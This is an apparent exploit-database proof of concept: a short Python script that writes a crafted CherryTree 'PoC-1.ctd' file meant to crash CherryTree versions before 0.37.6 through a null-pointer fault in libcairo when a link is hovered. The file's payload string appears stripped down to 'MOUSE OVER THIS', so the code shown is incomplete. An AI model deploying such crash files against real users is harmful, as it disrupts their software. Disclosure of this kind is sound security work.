#!/usr/bin/python ### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ### # Date: 2016-10-27 # PoC Author: n30m1nd # Vendor Homepage: http://www.giuspen.com/cherrytree/ # Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe # Version: Affects all versions of CherryTree prior to 0.37.6 # Tested on: Win7 64bit and Win10 64 bit # Credits # ======= # Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln. # Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better # How to # ====== # * Run this python script. It will generate a "PoC-1.ctd" file. # * Open the file and hover over the link. # Bonus # ===== # It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...) # Why? # ==== # For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when # trying to draw the contents of the graphical bitmaps. # Exploit code # ============ crashfile = ''' MOUSE OVER THIS ''' with open("PoC-1.ctd", 'w') as f: f.write(crashfile) f.close()